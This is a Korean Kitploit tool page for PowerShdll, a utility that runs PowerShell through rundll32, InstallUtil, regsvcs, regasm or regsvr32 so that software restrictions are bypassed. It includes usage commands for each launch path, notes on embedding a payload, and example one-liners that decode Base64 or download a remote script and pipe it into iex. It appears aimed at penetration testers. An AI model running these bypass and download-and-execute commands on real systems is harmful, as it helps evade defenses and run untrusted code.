Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PowerShdll — rundll32로 PowerShell 실행. 소프트웨어 제한 우회. | Kitploit
도구/GitHubGitHub/p3nt4/powershdll
Defensive ToolsPayload GenerationCode AnalysisIDS/IPS EvasionPenetration TestingRed Teaming
GitHubp3nt4/powershdll

PowerShdll

rundll32로 PowerShell 실행. 소프트웨어 제한 우회.

저장소 보기
1.8k25425년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PowerShdll

dll만으로 PowerShell을 실행합니다.

powershell.exe에 접근할 필요 없이 PowerShell 자동화 dll을 사용합니다.

PowerShdll은 rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe 또는 독립 실행형 실행 파일로 실행할 수 있습니다.

dll 모드:

Rundll32:

root@kitploit:~
Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h      이 메시지를 표시합니다
rundll32 PowerShdll,main -f <path>       인수로 전달된 스크립트를 실행합니다
rundll32 PowerShdll,main -w      새 창에서 대화형 콘솔을 시작합니다 (기본값)
rundll32 PowerShdll,main -i      이 콘솔에서 대화형 콘솔을 시작합니다
대화형 콘솔이 없는 경우 출력 충돌을 방지하려면 -n을 사용하십시오

대안 (SubTee의 기술에 대한 크레딧):

root@kitploit:~
1. 
    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll
    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll
2. 
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShdll.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShdll.dll
3. 
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShdll.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShdll.dll
4. 
    regsvr32 /s  /u PowerShdll.dll -->DllUnregisterServer 호출
    regsvr32 /s PowerShdll.dll --> DllRegisterServer 호출

exe 모드

root@kitploit:~
Usage:
PowerShdll.exe <script>
PowerShdll.exe -h      이 메시지를 표시합니다
PowerShdll.exe -f <path>       인수로 전달된 스크립트를 실행합니다
PowerShdll.exe -i      이 콘솔에서 대화형 콘솔을 시작합니다 (기본값)

내장 페이로드

common.cs 파일의 start 메서드에서 "payload" 변수를 수정하여 페이로드를 내장할 수 있습니다. 페이로드가 내장된 경우 다른 모든 인수는 무시되고 PowerShdll 실행 시 페이로드가 실행됩니다.

예제

Base64로 인코딩된 스크립트 실행

root@kitploit:~
rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

참고: Empire 스테이저는 [System.Text.Encoding]::Unicode를 사용하여 디코딩해야 합니다.

스크립트 다운로드 및 실행

root@kitploit:~
rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

요구 사항

  • dll 모드에는 .Net v3.5 필요.
  • exe 모드에는 .Net v2.0 필요.

알려진 문제

일부 오류가 출력에 표시되지 않는 것 같습니다. Import-Module과 같은 명령이 실패해도 오류를 출력하지 않으므로 혼동될 수 있습니다. 명령을 올바르게 입력했는지 확인하십시오.

dll 모드에서 대화형 모드 및 명령 출력은 부모 프로세스의 콘솔을 가로채는 방식으로 작동합니다. 부모 프로세스에 콘솔이 없는 경우 -n 스위치를 사용하여 출력을 표시하지 않도록 하십시오. 그렇지 않으면 애플리케이션이 충돌합니다.

Rundll32가 인수를 처리하는 방식 때문에 스위치와 인수 사이에 여러 공백 문자를 사용하면 문제가 발생할 수 있습니다. 스크립트 내의 여러 공백은 괜찮습니다.

면책 조항

이 프로젝트는 보안 연구원 및 침투 테스터를 대상으로 하며, 시스템 소유자의 승인을 받은 경우에만 사용해야 합니다.

도구 다운로드